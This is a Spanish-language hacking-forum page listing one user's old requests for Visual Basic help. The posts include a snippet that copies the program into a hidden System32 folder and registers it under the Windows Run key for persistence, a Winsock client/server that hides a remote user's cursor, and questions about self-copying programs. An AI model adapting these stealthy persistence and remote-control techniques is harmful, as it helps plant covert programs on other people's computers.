elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: [1]
1  Programación / .NET (C#, VB.NET, ASP) / traduccion de codigo visual basic 2008 a visual c++ 2008? en: 22 Noviembre 2008, 17:49 pm
wenas alguien me podria ayudar a traducir el codigo de vb.net a c++?, he buscado en todas partes pero no hay nada.

solo quiero traducir esta parte del codigo no se si habrá una cosa tan simple para c++
se supone que tiene que borrar todas las carpetas y archivos que haya dentro del mismo. alguna ayuda?
acias.

Código:
#imports system.IO

My.Computer.FileSystem.DeleteDirectory("Carpeta", FileIO.DeleteDirectoryOption.DeleteAllContents)
2  Programación / Programación Visual Basic / Como ocultar el raton del todo en: 7 Junio 2008, 19:41 pm
wenas, a ver si alguien me ayuda en esto, que no consigo ocultar el raton del todo o mejor dixo nada de nada con el winsock

tengo este codigo:

Código:

'este en el cliente

Private sub cmdHideCursor()
On Error Resume Next
    ws.SendData "CHide"
end sub

'y este en el server

Private Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next
Dim dat As String
    ws.GetData dat, vbString
If dat = "CHide" Then
    Result = ShowCursor(False)
    ws.SendData "Cursor Hidden"
else
end if
end sub

acias ;)

Saludos
3  Programación / Programación Visual Basic / Copiarse a si mismo en: 28 Agosto 2005, 18:16 pm
Como es el codigo de copiarse a si mismo??

ESQUE NO ME SALE.... Si muevo el archivo a otra carpeta ya no se copia... :-[ AYUDA PLZ
 ::)
4  Programación / Programación Visual Basic / Como Borrar una clave En el registro ¿¿?? en: 28 Agosto 2005, 17:52 pm
 ;D Como es el Codigo Para borrar una clave de registro?

Asias  ;D ::)
5  Programación / Programación Visual Basic / Ayuda Con Un Codigo en: 24 Agosto 2005, 21:50 pm
Sabeis como podria hacer k el programa al iniciarse se copie a si mismo en una carpeta PERO K LUEGO AL FINALIZAR EL PROGRAMA
SE BORRE LA CARPETA
y tambien si no es molestia como Hacer K en vez de Filecopy me pusierais otra cosa (Para k me deje ejecutar el archivo en cualkier  carpeta por k si no no me deja AYUDA PLZ).

lo k tengo es esto:

Files.CreateFolder "C:\Windows\system32\Private System"
FileCopy "C:\Cosa\Cosa rara\Lol.exe", "C:\Windows\system32\Private System\Lol.exe"
Call SetAttr("C:\Windows\system32\Private System" & "\Lol.EXE", vbHidden)

pero No quiero esto Me ayudais?  :D ;D
6  Programación / Programación Visual Basic / AYUDAAAAAA!!!! Urgente!!! en: 8 Julio 2005, 20:39 pm
Haber tengo esto y me da un error diciendo File Not Found y Se me pone en amarillo toda esta fila: FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\System32\Private System" & App.EXEName & ".exe"

Ayuda!!! k Estoy k siempre me da algo Raro!!


Private Sub Form_Load()
Set sh = CreateObject("WScript.Shell")
Set ficheros = CreateObject("Scripting.FileSystemObject")
ficheros.CreateFolder "C:\Windows\system32\Private System"
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\system32\Private System" & App.EXEName & ".exe"
Call SetAttr("C:\Windows\system32\Private System" & "\HK.EXE", vbHidden)
sh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Private System", "C:\Windows\system32\Private System\HK.exe"
End
End Sub


Hmmmm.... hay que poner algun modulo??? XDDD
7  Programación / Programación Visual Basic / Necesito Ayuda!!! Como puedo sobreescribir......(VB) en: 8 Julio 2005, 19:49 pm
 ???Holas Haber, Como puedo sobreescribir carpetas usando el mkdir en visual basic 6??
tengo puesto... mkdir "C:\el nombre de la carpeta" pero no puedo sobreescribirla
Plz Ayudaaaaaaaa!!!!
Gracias  ;D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines